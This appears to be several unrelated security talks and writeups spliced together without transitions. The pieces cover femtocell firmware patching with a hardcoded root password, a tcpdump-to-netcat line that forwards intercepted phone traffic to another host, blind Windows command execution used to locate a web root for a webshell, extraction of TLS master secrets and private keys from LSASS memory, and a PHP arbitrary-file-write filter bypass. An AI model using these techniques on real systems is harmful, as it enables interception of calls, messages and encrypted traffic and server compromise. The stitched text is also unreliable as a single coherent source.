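```python
import zlib

WRS_MAGIC = bytes([0x05, 0x15, 0x01, 0x00])  # WindRiver deflate head magic

def deflate_wrs_image(blob: bytes) -> bytes:
    """Strip the 9-byte WindRiver header (4-byte magic, 4-byte length,
    1-byte flag) and inflate the zlib stream that follows."""
    if blob[:4] != WRS_MAGIC:
        raise ValueError("not a WindRiver deflate image")
    # blob[4:8] is the length field, blob[8] the 0x08 flag byte;
    # the zlib stream starts at offset 9.
    return zlib.decompress(blob[9:])
```

This produces the same result as `dd ... skip=9` followed by `zlib-flate -uncompress`.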
Recover login password
Hacking Femtocell
• Login init process
• user name
• password hash
27
Recover login password
Hacking Femtocell
• Decrypt password hash
• 73l8gRjwLftklgfdXT+MdiMEjJwGPVMsyVxe16iYpk8=
• Base64 encode?
• EF797C8118F02DFB649607DD5D3F8C7623048C9C063D532
CC95C5ED7A898A64F
• I’m feeling lucky
• http://www.hashkiller.co.uk/
• SHA256
• 12345678
•
• Always try 88888888 12345678 first!
28
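The lucky guess on this slide can be confirmed offline: the Base64 blob decodes byte-for-byte to the SHA-256 digest of 12345678 (a standard-library check):

```python
import base64, hashlib

blob = base64.b64decode("73l8gRjwLftklgfdXT+MdiMEjJwGPVMsyVxe16iYpk8=")
print(blob.hex().upper())
# EF797C8118F02DFB649607DD5D3F8C7623048C9C063D532CC95C5ED7A898A64F
assert blob == hashlib.sha256(b"12345678").digest()
```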
Patch it
Hacking Femtocell
• Not weak password?
• Find the authenticate function
29
Patch it
Hacking Femtocell
• Bypass login process
• patch the firmware
• zlib compress it
• add vxWorks header number
• download file by ftp
• Hot patch
• Boot shell
• `l’ command unzip and load mpcs.Z
• `m’ command patch
• 0xc0574d64
• DF FF FF 0A -> DF FF FF EA
• BEQ loc_C0574CE8 -> B loc_C0574CE8
30
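The one-byte hot patch above works because ARM stores the condition code in the top 4 bits of the 32-bit instruction, and instructions are little-endian, so the condition lives in the fourth byte: 0x0A (EQ) becomes 0xEA (AL), turning BEQ into an unconditional B. A sketch (0xc0574d64 is the in-memory address from the slide; the file offset used below is a made-up illustration):

```python
BEQ = bytes.fromhex("DFFFFF0A")  # BEQ loc_C0574CE8, little-endian
B_  = bytes.fromhex("DFFFFFEA")  # B   loc_C0574CE8

def patch_beq_to_b(image: bytearray, off: int) -> None:
    """Flip the ARM condition field from EQ (0x0) to AL (0xE) at a known offset."""
    if image[off:off + 4] != BEQ:
        raise ValueError("expected BEQ at this offset")
    image[off + 3] = 0xEA  # condition nibble sits in the highest byte
```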
vxWorks kernel shell
Hacking Femtocell
• Log in then debug the kernel
• Lots of tools
• Debug it!
• `func’
• Modify it!
• `mem’
31
Capture data packets
Hacking Femtocell
• Forward
• telnet router
• root:5up
• tcpdump -n -i br0 -s 0 -w - host not 192.168.197.104 | netcat
192.168.197.104 9527 &
• nc -l -v -p 9527 >> sms.pcap
• Listen
• mirror router port
• wireshark
• real-time
32
Capture data packets
Hacking Femtocell
33
Encrypted?
Hacking Femtocell
• Read log file, IPSec?
• Find the enc key and auth key
34
Fix protocol port
Hacking Femtocell
• IPSec
• 500 -> 60295 ISAKMP
• 4500 -> 60296 UDPENCAP
35
Now decrypt it
Hacking Femtocell
• Edit ESP SAs
• Add uplink and downlink SA separately
36
Wrong protocol
Hacking Femtocell
• Iu-h protocol?
37
Find the answer
Hacking Femtocell
• Reverse GSM board firmware
38
Rebuild Wireshark
Hacking Femtocell
• Write our own dissector?
• Complicated…
• ASN1
• RUA
• RANAP
• Blablabla…
• Analyze packets byte by byte
• Fix the wireshark dissector rules
• Rebuild it!
• Voilà
39
Capture SMS
Hacking Femtocell
40
Capture voice
Hacking Femtocell
41
Capture GPRS data
Hacking Femtocell
42
Capture GPRS data
Hacking Femtocell
43
Capture your email
Hacking Femtocell
44
Summary and References
Hacking Femtocell
• Summary
• VxWorks is not easy to hack
• More mining, more fun
• Wanna know more? Feel free to contact us
• References
•
TRAFFIC INTERCEPTION AND REMOTE MOBILE PHONE CLONING WITH A
COMPROMISED CDMA FEMTOCELL -
https://www.nccgroup.trust/globalassets/newsroom/us/blog/docu
ments/2013/femtocell.pdf
• VxWorks Command-Line Tools User's Guide -
http://88.198.249.35/d/VxWorks-Application-Programmer-s-
Guide-6-6.pdf
• VxWorks Application Programmer's Guide, 6.6 –
http://read.pudn.com/downloads149/ebook/646091/vxworks_app
lication_programmers_guide_6.6.pdf
45
Getting the Web Path via Windows Command Execution
In some situations you have Windows command execution on a target, but the host has no outbound network access and the commands produce no echo.
You still need the absolute path of a web directory: with that path you can combine other vulnerabilities to drop a webshell, or write command output into the web root and fetch it over HTTP (which effectively gives you echo back).
On Windows this can be obtained with the methods below.
If you only want the conclusion, jump straight to the Summary.
Some pitfalls
The command here is borrowed from 520's writeup
https://sec.lz520520.com/2021/01/596/
(cmd /c is removed here; add it back when you need it)
for /f %i in ('dir /s /b C:\Users\46479\qqqq.txt') do (echo
%i)
It turns out this does not support paths that contain spaces.
Improving the script: add "delims=***", which makes *** the delimiter instead of the default space.
Combined with a command that writes the found path into a new file, this becomes:
for /f "delims=***" %i in ('dir /s /b
C:\Users\46479\qqqq.txt') do (echo %i)
for /f "delims=***" %i in ('dir /s /b
C:\Users\46479\qqqq.txt') do (echo %i>%i.jsp)
The absolute path is written into qqqq.txt.jsp successfully:
Change the extension to suit the target so the file can be reached directly over the web.
I thought that was the end of it, but this command has a pitfall inside a batch file — it refuses to run there.
After some experimenting, I found the command needs a few changes under a batch script. The rules are:
* First, references to single-character variables in a batch file must use %% instead of %.
* Second, to use a command's output as the loop set, wrap it in backquotes ``, not single quotes ''.
* Third, when backquotes are used, the /F option must also carry the usebackq keyword.
The converted command:
for /f "usebackq delims=***" %%i in (`DIR /s /b
D:\User\46479\qqqq.txt`) do (echo %%i>%%i.txt)
With that it runs fine from a batch file.
Summary
Windows command execution, no outbound access, no echo — and in some special cases you need the web absolute path.
If running directly in cmd:
for /f "delims=***" %i in ('dir /s /b D:\login.jsp') do
(echo %i>%i.txt)
If running from a batch script, change it to:
for /f "usebackq delims=***" %%i in (`DIR /s /b
D:\login.jsp`) do (echo %%i>%%i.txt)
The command searches drive D for login.jsp; for every file found, it creates a new file in that same directory, named by appending the .txt suffix, whose content is the absolute path.
For example, if login.jsp is found at D:\web\login.jsp, then D:\web\login.jsp.txt is created with the content D:\web\login.jsp.
Adjust the suffix and path above to the actual situation.
A screenshot from a successful real-world run:
Cunning with CNG:
Soliciting Secrets from Schannel
DEF CON 24
1470502800
Why do you care?
Ability to decrypt Schannel TLS connections that use ephemeral key exchanges
Ability to decrypt and extract private certificate and session ticket key directly
from memory
Public Cert/SNI to PID/Logon Session Mapping
What you get out of this talk
Agenda
A very short SSL/TLS Review
A background on Schannel & CNG
The Secret Data
The Forensic Context
Demo >.>
DisclaimeR
This is NOT an exploit
It’s just the spec :D
…and some implementation specific oddities
Microsoft has done nothing [especially] wrong
To the contrary, their documentation was actually pretty great
Windows doesn’t track sessions for processes that load their own TLS libs
I’m looking at you Firefox and Chrome
Windows doesn’t track sessions for process that don’t use TLS…
That’d be you TeamViewer...
BackgroUnd
TLS, Schannel, and CNG
The now
infamous TLS
Handshake
[ Initial Connection ]
E.G.: TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256
The now
infamous TLS
Handshake
or, Session Resumption
PeRFect FoRWaRd Secrecy
What we want to do
One time use keys, no sending secrets!
What TLS actually does
Caches values to enable resumption
recommends `An upper limit of 24 hours is suggested for session ID lifetimes`
When using session ticket extension, sends the encrypted state over the network
basically returning to the issue with RSA, but using a more ephemeral key...
What implementations also do
Store symmetric key schedules (so you can find the otherwise random keys...)
Cache ephemeral keys and reuse for a while...
YEAR: 1992
CLASS: HUMAN
ID: WHITFIELD DIFFIE
EVENT: AUTHENTICATION AND
AUTHENTICATED KEY EXCHANGES
Schannel & CNG
Secure Channel
It’s TLS -> the Secure Channel for Windows!
A library that gets loaded into the “key isolation
process” and the “client” process
Technically a Security Support Provider (SSP)
Spoiler: the Key Isolation process is LSASS
The CryptoAPI-Next Generation (CNG)
Introduced in Vista (yes you read correctly)
Provides Common Criteria compliance
Used to store secrets and ‘crypt them
Storage via the Key Storage Providers (KSPs)
Generic data encryption via DPAPI
Also brings modern ciphers to Windows (AES for
example) and ECC
Importantly, ncrypt gets called out as the “key
storage router” and gateway to the CNG Key
Isolation service
Schannel Preferred Cipher Suites
Windows 7
Windows 10
Windows Vista
*ListCipherSuites sample code found here: https://technet.microsoft.com/en-us/library/bb870930.aspx
CLASS: RoBOT
QUERY: Y U STILL USE
VISTA, BABY???
Microsoft’s TLS/SSL Docs
ClientCacheTime: “The first time a client connects to a server through the Schannel SSP, a full TLS/SSL
handshake is performed.”
“When this is complete, the master secret, cipher suite, and certificates are stored in the session cache on
the respective client and server.”*
ServerCacheTime: “…Increasing ServerCacheTime above the default values causes Lsass.exe to consume
additional memory. Each session cache element typically requires 2 to 4 KB of memory”*
MaximumCacheSize: “This entry controls the maximum number of cache elements. […] The default value
is 20,000 elements.” *
*TLS/SSL Settings quoted from here: https://technet.microsoft.com/en-us/library/dn786418(v=ws.11).aspx
Schannel
by the docs
Diagram based on:
https://technet.microsoft.com/en-us/library/dn786429.aspx
CNG
Key Isolation
by the docs
Diagram based on: https://msdn.microsoft.com/en-us/library/windows/desktop/bb204778.aspx
Background Summary
We’re Looking Here
For These
Because of That
LSASS.exe
Mission
We want to be able to see data that has been protected with TLS/SSL and subvert efforts
at implementing Perfect Forward Secrecy
We want to gather any contextual information that we can use for forensic purposes,
regardless of whether or not we can accomplish the above
We (as an adversary) want to be able to get access to a single process address space and
be able to dump out things that would enable us to monitor/modify future traffic, or
possibly impersonate the target
We want to do this without touching disk
SecrEts
ThE Keys
Master Secret
Session Keys
Ephemeral Private Key*
Persistent Private Key
(Signing)
Session Ticket Key*
Pre-Master Secret
+
The Keys? What do they get us?
=
=
=
=
a single connection
a single session
multiple sessions
multiple sessions + identity
The Keys? We got ’em…all.
*
CSessionCacheServerItem
+0xF0
CSslCredential
+0x48
CSslServerKey
+0x08
NcryptSslKey
+0x10
NcryptsslpKey
pair +0x18
NcryptKey
+0x10
KPSPK
+0xD0
CSslContext
CEphemKeyData
+0x48
NcryptSslkey
+0x10
NcryptSslpEphemKey
+0x18
NcryptKey
+0x10
KPSPK
+0x60
*
CSessionCache<type>Item
+0xF0
NcryptSslkey
+0x10
NcryptsslpMasterKey
+0x30
CSslUserContext
+0x18, +0x20
NcryptsslpSessionKey
+0x18
BcryptKey
+0x10
MSSymmetricKey
+0x18
msprotectkey
BcryptKey
+0x10
MSSymmetricKey
+0x18
EccKey
+0x18
NcryptSslKey
+0x10
Session Keys
Smallest scope / most ephemeral
Required for symmetric encrypted comms
Not going to be encrypted
Approach Premise:
Start with AES
AES keys are relatively small and pseudo-random
AES key schedules are larger and deterministic
… they are a “schedule” after all.
Key schedules usually calculated once and stored*
Let’s scan for matching key schedules on both
hosts
FindAES from: http://jessekornblum.com/tools/
Session Keys
_SSL_SESSION_KEY
4
cbStructLength
4
dwMagic [“ssl3”]
4
dwProtocolVersion
4/8
pvCipherSuiteListEntry
4
IsWriteKey
4/8
pvBcryptKeyStruct
_BCRYPT_KEY_HANDLE
4
cbStructLength
4
dwMagic [“UUUR”]
4/8
pvBcryptProvider
4/8
pvBcryptSymmKey
_MS_SYMMETRIC_KEY
4
cbStructLength
4
dwMagic [“MSSK”]
4
dwKeyType
...
...
4
KeyLength
?
SymmetricKey
?
SymmKeySchedule
CSslUserContext
Look familiar? Bcrypt keys are used a lot: think Mimikatz
The Ncrypt SSL Provider (ncryptsslp.dll)
These functions do three things:
Check the first dword for a size value
Check the second dword for a magic ID
Return the passed handle* if all is good
Ncryptsslp Validation function Symbols
Ncryptsslp Validation function Symbols
*Handles are always a pointer here
The Ncrypt SSL Provider (ncryptsslp.dll)
SSL Magic
Size (x86)
Size (x64)
Validation Functions
ssl1
0xE4
0x130
SslpValidateProvHandle
ssl2
0x24
0x30
SslpValidateHashHandle
ssl3
?
?
<none>
ssl4
0x18
0x20
SslpValidateKeyPairHandle
ssl5
0x48
0x50
SslpValidateMasterKeyHandle
ssl6
0x18
0x20
SslpValidateEphemeralHandle
ssl7
?
?
<none>
ssl3 was already discussed,
appears in the following functions:
TlsGenerateSessionKeys+0x251
SPSslDecryptPacket+0x43
SPSslEncryptPacket+0x43
SPSslImportKey+0x19a
SPSslExportKey+0x76
Ssl2GenerateSessionKeys+0x22c
Pre-Master Secret (PMS)
The ‘ssl7’ struct appears to be used specifically
for the RSA PMS
As advised by the RFC, it gets destroyed quickly,
once the Master Secret (MS) has been derived
Client generates random data, populates the
ssl7 structure, and encrypts
In ECC the PMS is x-coordinate of the shared
secret derived (which is a point on the curve), so
this doesn’t /seem/ to get used in that case
Functions where ssl7 appears:
ncryptsslp!SPSslGenerateMasterKey+0x75
ncryptsslp!SPSslGenerateMasterKey+0x5595
ncryptsslp!SPSslGeneratePreMasterKey+0x15e
ncryptsslp!TlsDecryptMasterKey+0x6b
Bottom line:
It’s vestigial for our purposes - it doesn’t do
anything another secret can’t
Master Secret
Basically the Holy Grail for a given connection
It always exists
It’s what gets cached and used to derive
the session keys
Structure for storage is simple - secret is
unencrypted (as you’d expect)
This + Unique ID = decryption, natively in tools
like wireshark
So...how do we get there?
_SSL_MASTER_SECRET
4
cbStructLength
4
dwMagic [“ssl5”]
4
dwProtocolVersion
0/4
dwUnknown1* [alignment?]
4/8
pCipherSuiteListEntry
4
bIsClientCache
48
rgbMasterSecret
4
dwUnknown2 [reserved?]
Master Secret
_SSL_MASTER_SECRET
4
cbStructLength
4
dwMagic [“ssl5”]
4
dwProtocolVersion
0/4
dwUnknown1* [alignment?]
4/8
pCipherSuiteListEntry
4
bIsClientCache
48
rgbMasterSecret
4
dwUnknown2 [reserved?]
Master Secret Mapped to Unique Identifier
The Master Key is linked back to a unique ID
through an “NcryptSslKey”
The NcryptSslKey is referenced by an
“SessionCacheItem”
The SessionCacheItem contains either the
SessionID, or a pointer and length value for a
SessionTicket
Instantiated as either client or server
item
At this point, we can find cache items, and extract
the Master Secret + Unique ID
… Houston, we has plaintext.
_SESSION_CACHE_CLIENT_ITEM
4/8
pVftable
…
…
@0x10
pMasterKey
…
…
@0x88
rgbSessionID[0x20]
…
…
@0x128
pSessionTicket
@0x130
cbSessionTicketLength
_NCRYPT_SSL_KEY_HANDLE
4
cbStructLength
4
dwMagic [“BDDD”]
4/8
pNcryptSslProvider
4/8
pNcryptSslKey
_SSL_MASTER_SECRET
4
cbStructLength
4
dwMagic [“ssl5”]
4
dwProtocolVersion
0/4
dwUnknown1* [alignment?]
4/8
pCipherSuiteListEntry
4
bIsClientCache
48
rgbMasterSecret
4
dwUnknown2 [reserved?]
Master Secret Mapped to Unique Identifier
RSA Session-
ID:97420000581679ae7a064f3e4a350682dca9e839ebca0
7075b1a944d8b1b71f7 Master-
Key:897adf533d0e87eadbc41bc1a13adb241251a56f0504
35fad0d54b1064f83c50cedb9d98de046008cde04a409779
5df2
RSA Session-
ID:f5350000be2cebcb15a38f38b99a20751ed0d53957890
1ddde69278dbbf9738e Master-
Key:716a1d493656bf534e436ffb58ff2e40000516b735db
d5dfaff93f37b5ac90ba1c3a25ba3e1505b8f3aa168a657e
007b
RSA Session-
ID:bcb3aff3581fccb9fe268d46f99f5e2c6cc9e59e51c67
14d70997e63b9c6fe73 Master-
Key:e45e18945197c2f0a2addb901a9558f194241d2b488c
dc3d1f81e1271acb4dc776e3c772177c7d0462afeca57a3d
9cb2
RSA Session-
ID:c7d0f952fb3fc4999a692ce3674acb1a4b2c791ece2c6
d1621af95e6414ec3b0 Master-
Key:db93026b71e0323b60e2537f0eeebf4fc321094b8a9a
6ccd8cf0f50c7fa68c294f6c490d5af3df881db585e2a10a
0aea
Wireshark SSL Log Format
Wireshark SSL input formats found here: https://github.com/boundary/wireshark/blob/master/epan/dissectors/packet-ssl.c
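The log lines above follow Wireshark's key-log format for pre-TLS-1.3 sessions; turning an extracted cache item into an entry is a one-liner (a sketch — the parameter names are mine, not Schannel's):

```python
def keylog_line(session_id: bytes, master_secret: bytes) -> str:
    """One Wireshark SSL key-log entry in the 'RSA Session-ID' form shown above."""
    return "RSA Session-ID:%s Master-Key:%s" % (session_id.hex(), master_secret.hex())
```

For example, `keylog_line(cache_item_session_id, rgb_master_secret)` yields a line you can paste into the (Pre)-Master-Secret log file configured under Wireshark's TLS protocol preferences.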
Ephemeral & Persistent Private Keys
Both share the same structure
Both store secrets in a Key Storage Provider
Key struct (KPSK)
The “Key Type” is compared with different
values
ssl6 gets compared with a list stored in
bcryptprimitives
ssl4 gets compared with a list stored in
NCRYPTPROV
The Key Storage Provider Key (KPSK) is
referenced indirectly through an “Ncrypt
Key” struct*
*NcryptKey not to be confused with NcryptSslKey
_SSL_KEY_PAIR
4
cbStructLength
4
dwMagic [ “ssl4” | “ssl6” ]
4
dwKeyType
4
dwUnknown1 [alignment?]
4/8
pKspProvider
4/8
pKspKey
_NCRYPT_KEY_HANDLE
4
cbStructLength
4
dwMagic [ 0x44440002 ]
4
dwKeyType
4
dwUnknown1 [alignment?]
4/8
pKspProvider
4/8
pKspKey
_KSP_KEY
4
cbStructLength
4
dwMagic [ “KSPK” ]
4
dwKeyType
...
...
@0x60
pMSKY
@0xD0
pDpapiBlob
@0xD8
dwDpapiBlobLength
Ephemeral Private Key
For performance, reused across connections
Given the public connection params, we can
derive the PMS and subsequently MS
Stored unencrypted in a LE byte array
Inside of MSKY struct
The curve parameters are stored in the KPSK
Other parameters (A&B, etc) are stored in MSKY
w/ the key
Verified by generating the Public & comparing
The Public Key is also stored in the first pointer
of the CEphemData struct that points to “ssl6”
In-line with suggestion of this paper: http://dualec.org/DualECTLS.pdf
“Persistent” Private Key
The RSA Key that is stored on disk
Unique instance for each private RSA Key – by
default, the system has several
E.g. one for Terminal Services
RSA Keys are DPAPI protected
Lots of research about protection / exporting
Note the MK GUID highlighted from the Blob
The Key is linked to a given Server Cache Item
Verified by comparing the DPAPI blob in
memory to protected certificate on disk
Also verified through decryption
Decrypting Persistent Key - DPAPI
Can extract the blob from memory and decrypt w/ keys
from disk
DPAPIck / Mimikatz
OR
Can decrypt directly from memory :D
MasterKeys get cached in Memory
On Win10 in: dpapisrv!g_MasterKeyCacheList
See Mimilib for further details
Even though symbols are sort of required, we
could likely do without them
There are only two Bcrypt key pointers in lsasrv’s
.rdata section (plus one lock)
Identifying the IV is more challenging
Cached DPAPI MK + Params to Decrypt
Decrypting Persistent Key - DPAPI
Session Tickets
Not seemingly in widespread use with IIS?
Comes around w/ Server 2012 R2
Documentation is lacking.
Enabled via reg key + powershell cmdlets?
Creates an “Administrator managed”
session ticket key
Schannel functions related to Session Tickets
load the keyfile from disk
Export-TlsSessionTicketKey :D
Reference to DISABLING session tickets in Win8.1 Preview release notes: https://technet.microsoft.com/en-us/library/dn303404.aspx
Session Ticket Key
Keyfile contains a DPAPI blob, preceded by a
SessionTicketKey GUID + 8 byte value
Key gets loaded via schannel
The heavy lifting (at least in Win10) is done
via mskeyprotect
AES key derived from decrypted blob via
BCryptKeyDerivation()
Key gets cached inside mskeyprotect!
No symbols for cache : /
No bother, we can just find the Key GUID
that’s cached with it :D
Session Ticket Key GUID
Possibly Salt or MAC?
Size of ensuing DPAPI Blob
DPAPI Blob (contains it’s own fields)
Decrypting Session Tickets
Session Ticket structure pretty much follows the
RFC (5077), except:
MAC & Encrypted State are flipped (makes
a lot of sense)
After extracting/deriving the Symm key, it’s just
straight AES 256
Contents of the State are what you’d expect:
Timestamp
Protocol/Ciphersuite info
MS struct
Key GUID
IV
MAC
Encrypted
TLS
State
Decrypting Session Tickets
Master Secret
Secrets are cool and all...
But Jake, what if I don’t have a packet capture?
(And I don’t care about future connections?)
ThE Context
Inherent Metadata TLS Provides
Core SSL/TLS functionality
Timestamps
The random values *typically* start with a 4-byte
timestamp (if you play by the RFCs)
Identity / fingerprinting
Public Key
Session ID*
Offered Cipher Suites / Extensions
Session ID’s are arbitrary, but are not always
random -> Schannel is a perfect example
uses MaximumCacheEntries parameter when creating
the first dword of the random, leading to a(n
imperfect) fingerprint of two zero bytes in 3/4th byte*
TLS Extensions
Server Name Indication (SNI)
Virtual hosts
Application-Layer Protocol Negotiation (ALPN)
Limited, but what protocol comes next
fingerprinting?
Session Tickets
Key GUID
*Referenced in this paper: http://dualec.org/DualECTLS.pdf
Schannel Caching Parameters
Parameters:
The following control upper-limit of cache time:
m_dwClientLifespan
m_dwServerLifespan
m_dwSessionTicketLifespan
All of which:
are set to 0x02255100 (10hrs in ms)
Also of Interest:
m_dwMaximumEntries (set to 0x4e20 or 20,000
entries by default)
m_dwEnableSessionTicket controls use of
session tickets (e.g. 0, 1, 2)
m_dwSessionCleanupIntervalInSeconds (set
to 0x012c or 300 seconds by default)
HOWEVER!
Schannel is the library, the process has control
Proc can purge its own cache at will
For example, IIS reportedly* purges after
around two hours
Schannel maintains track of process, frees cache
items after client proc terminates : <
Haven’t looked at the exact mechanism
As you’ll see, the upside is that the Process
ID is stored in the Cache
This is your Schannel Cache (x64)
'_SSL_SESSION_CACHE_CLIENT_ITEM': [ 0x148, {
'Vftable': [0x0, ['pointer64', ['void']]],
'MasterKey': [0x10, ['pointer64', ['void']]],
'PublicCertificate': [0x18, ['pointer64', ['void']]],
'PublicKey': [0x28, ['pointer64', ['void']]],
'NcryptSslProv': [0x60, ['pointer64', ['void']]],
'SessionIdLen': [0x86, ['short short']],
'SessionId': [0x88, ['array', 0x20, ['unsigned char']]],
'ProcessId': [0xa8, ['unsigned long']],
'MaxLifeTime': [0xB0, ['unsigned long']],
'CertSerializedCertificateChain': [0xB0, ['pointer64', ['void']]],
'UnkList1Flink': [0xB8, ['pointer64', ['void']]],
'UnkList1Blink': [0xC0, ['pointer64', ['void']]],
'UnkCacheList2Flink': [0xC8, ['pointer64', ['void']]],
'UnkCacheList2Blink': [0xD0, ['pointer64', ['void']]],
'ServerName': [0x108, ['pointer64', ['void']]],
'LogonSessionUID': [0x110, ['pointer64', ['void']]],
'CSessCacheManager': [0x120, ['pointer64', ['void']]],
'SessionTicket': [0x138, ['pointer64', ['void']]],
'SessionTicketLen': [0x140, ['int']],
}],
This is your Schannel Cache (x64)
'_SSL_SESSION_CACHE_SERVER_ITEM': [ 0x110, {
'Vftable': [0x0, ['pointer64', ['void']]],
'NcryptKey': [0x10, ['pointer64', ['void']]],
'NcryptSslProv': [0x60, ['pointer64', ['void']]],
'SessionId': [0x88, ['array', 0x20, ['unsigned char']]],
'ProcessId': [0xa8, ['unsigned long']],
'MaxLifeTime': [0xB0, ['unsigned long']],
'LastError?': [0xE8, ['unsigned long']],
'CSslCredential': [0xF0, ['pointer64', ['void']]],
}],
This is your Schannel Cache on Drugs Vista
'_SSL_SESSION_CACHE_CLIENT_ITEM': [ 0xf0, {
'Flink': [0x0, ['pointer', ['void']]],
'Blink': [0x4, ['pointer', ['void']]],
'ProcessId': [0x8, [['unsigned long']],
'MasterKey': [0x14, ['pointer', ['NcryptSslKey']]],
'CipherSuiteId': [0x1C, ['pointer', ['void']]],
'ECCurveParam': [0x20, ['pointer', ['void']]],
'NcryptSslProv': [0x28, ['pointer', ['void']]],
'PublicCertificate': [0x2C, ['pointer', ['void']]],
'PublicCert2': [0x34, ['pointer', ['void']]],
'PublicKeyStruct': [0x3C, ['pointer', ['void']]],
'PublicCertStruct3': [0x44, ['pointer', ['void']]],
'ServerName': [0x80, ['pointer', ['void']]],
'SessionIdSize': [0x94, ['short short']],
'SessionId': [0x98, ['array', 0x20, ['unsigned char']]],
'ErrorCode': [0xEC, ['pointer64', ['void']]],
}],
AUtomation
Volatility / Rekall
Plugins for both – by default (no args) they:
Find LSASS
Scan Writeable VADs / Heap for Master Key
signature (Volatility) or directly for
SessionCacheItems (Rekall)
Dump out the wireshark format shown earlier
Hoping to have functional powershell module or
maybe incorporation into mimikatz? (Benjamin
Delphy is kinda the man for LSASS)
Limitations
We’re working with internal, undocumented structures
They change over time -- sometime around April 2016, an element appears to have been inserted in
cache after the Session ID and before the SNI
Not a huge deal, except when differences amongst instances of same OS (e.g. ones that have
and have not been updated)
Relying on symbols for some of this
MS giveth and can taketh away.
Still, can be done without them, just slightly less efficiently.
You need to be able to read LSASS memory
Not a huge deal in 2016, but still merits mention -- you need to own the system
If you own the system, you can already do bad stuff (keylog / tap net interface)
This is why it’s probably most useful in a forensic context
Decrypting an RDP Session (Ephemeral 🔑 XCHG)
DOMO TIME
Decrypting an RDP Session (Ephemeral 🔑 XCHG)
Keycodes from: https://msdn.microsoft.com/en-us/library/aa299374.aspx
H
e
l
l
o
<space>
D
e
f
c
0
n
“
”
Fin.
QUestions?
@TinRabbit_
Special Thanks
For general support, helpful comments, their time, and encouragement.
Áine Doyle
Badass Extraordinaire
(OCSC)
Dr. John-Ross Wallrabenstein
Sypris Electronics
Dr. Marcus Rogers
Purdue Cyber Forensics Laboratory
Michael Hale Ligh (MHL)
Volexity
Tatiana Ringenberg
Sypris Electronics | pdf |
Hunting an Arbitrary File Write in an O&M Audit System
Sharing some of the techniques from my recent vulnerability hunting.
Internship season is coming — any kind boss willing to take on an intern? I can fetch tea and pour water like a pro.
The target system is shown below:
It is a security audit system. Searching the keywords from its home page in the network security product directory shows the vendor is a certain Guangzhou company.
Network security product directory: https://t.wangan.com/c/products.html
Meanwhile, some historical vulnerabilities turned up through search engines.
I had hoped to pull a ready-made payload out and fire it. But looking closer, the version in front of me is the latest 3.x, while the WooYun records date all the way back to 2011(?!).
The versions clearly do not match, and the new version uses an MVC pattern. Skip it.
With no usable public vulnerabilities, the only option was to dig up my own. Falling back on the old routine, I collected a batch of sites running the same product through FOFA, planning to probe weak passwords, get in, and hunt for post-auth bugs.
Tested a dozen or so sites without a single success. Dead end!
Systems like this usually ship as an ISO image or an installer package. Since both the vendor and the product version were known, I could go hunting for the image or installer, extract the source code, and audit it.
Baidu cloud file search engine: https://www.lingfengyun.com/
Filtering the results, I found that a user had shared the operation manual for this kind of system back in 2019. I downloaded it and found the manual covers both the OpenStack and the Docker installation methods.
OpenStack needs its own environment, which my machine did not have, so I only skimmed the Docker method.
The docker pull points at a private registry. Still, worth noting: docker push normally uses the form username/imagename, so once you know the username you can search for its images. In the manual, the pull address is *nsec.com.
Try searching with docker search xxxnsec.
Two images show up here — a gateway and a web firewall. But when I tried to pull them, the download failed.
Checked Docker Hub as well:
Nothing there. The content had apparently been wiped. What a pity.
If the user shared the operation manual, an installer package probably exists too.
Going straight into that user's shared files and filtering for zip/rar archives, I finally pinned down, by file size, a zip ending in V3.7.
Downloaded it locally; it unpacks into an ISO image file.
Built the environment with VMware and started installing the program following the prompts.
After installation it asks for an account and password.
The extracted files contain no installation document, and nothing similar showed up in the historical shares. A few blind weak-password guesses all failed.
This reminded me of an article master Renzhe posted a while back, also about reading system files without knowing the target host's credentials.
I created a fresh CentOS 7 VM locally and attached an existing virtual disk, selecting the audit system's vmdk file for the disk.
Boot the CentOS 7 system and inspect the disks and partitions:
sudo fdisk -l
An extra sdb2 appears — this is the existing virtual disk just attached, i.e. the audit system's disk.
Mount it.
Since the target program is written in PHP, a quick find locates it.
Find the corresponding path, tar up the whole directory, and pull it out. Source code in hand!
On to the audit.
Since it is MVC, go straight to the Controllers.
A method in indexController was found to call file_put_contents(),
with controllable parameters; in the third line, file_put_contents is invoked, giving an arbitrary file write.
cert is the content; since username is concatenated at the end of the path, ../ traverses directories directly.
I tried writing a phpinfo in for an execution test,
and found the written content gets altered. After a series of tests: whenever <, >, ;, ' or " appears, a \ is prepended before that character.
The injected \ breaks the PHP syntax, so the code cannot execute. This is where a PHP quirk comes in.
Link: https://blog.csdn.net/chengjianghao/article/details/100078052
With a closing tag: everything after ?> is output as plain text, until the next <? or <?php.
Without a closing tag: everything after is treated as PHP code, until there is no code left.
Omitting the closing tag does not affect execution of the PHP code. If you send <?php phpinfo();, the final form is \<?php phpinfo()\;
The ; here also ends up escaped, so the statement still cannot run. I asked the masters in the group for help,
and under master 1's guidance arrived at the final payload: <?php if(expr) — in PHP, if uses {} as its terminator, so no semicolon is needed.
Likewise, using while also works.
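The escaping behavior described above can be modeled with a tiny sketch (the filter below is my reconstruction from the observed behavior — a backslash prepended before < > ; ' " — not the vendor's actual code). It shows why the if(expr) form survives: the payload needs no semicolon or quotes, so only the leading < gets escaped, and that backslash lands outside the <?php tag, where it is just literal output.

```python
def escape_like_target(s: str) -> str:
    """Reconstruction of the observed filter: prepend '\\' before < > ; ' \" characters."""
    return "".join("\\" + c if c in "<>;'\"" else c for c in s)

# A plain payload is broken: the injected backslashes become PHP syntax errors.
print(escape_like_target('<?php phpinfo();'))       # \<?php phpinfo()\;

# The if(expr) form: only the '<' is escaped, outside the PHP region.
print(escape_like_target('<?php if(phpinfo()){}'))  # \<?php if(phpinfo()){}
```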
~ Jay Turla @shipcod3
CAR INFOTAINMENT HACKING
METHODOLOGY AND ATTACK
SURFACE SCENARIOS
WHOAMI
▸ Jay Turla @shipcod3
▸ app security engineer
@Bugcrowd
▸ ROOTCON goon
▸ contributed to some
security tools
▸ I love PS4
▸ Not the creator of Turla malware
▸ Loves to party
BEFORE ANYTHING ELSE….. WE NEED AN INSPIRATIONAL QUOTE
…SCOPE & LIMITATIONS
▸ Infotainment bugs and its attack surfaces
▸ No Canbus Hacking
▸ Methodologies, Security Bugs But Not Full Takeover of the Car
(because infotainments have limitation)
▸ Kinda similar to Jason Haddix’s “The Bug Hunters Methodology”
(in fact inspired by it)
▸ Probably miss out some attack surfaces (only common ones with known
vulnerabilities or proof of concept)
COMMON ATTACK SURFACES
BY CRAIG SMITH IN HIS BOOK
“THE CAR HACKER’S
HANDBOOK”
COMMON ATTACK SURFACES LINKED TO THE
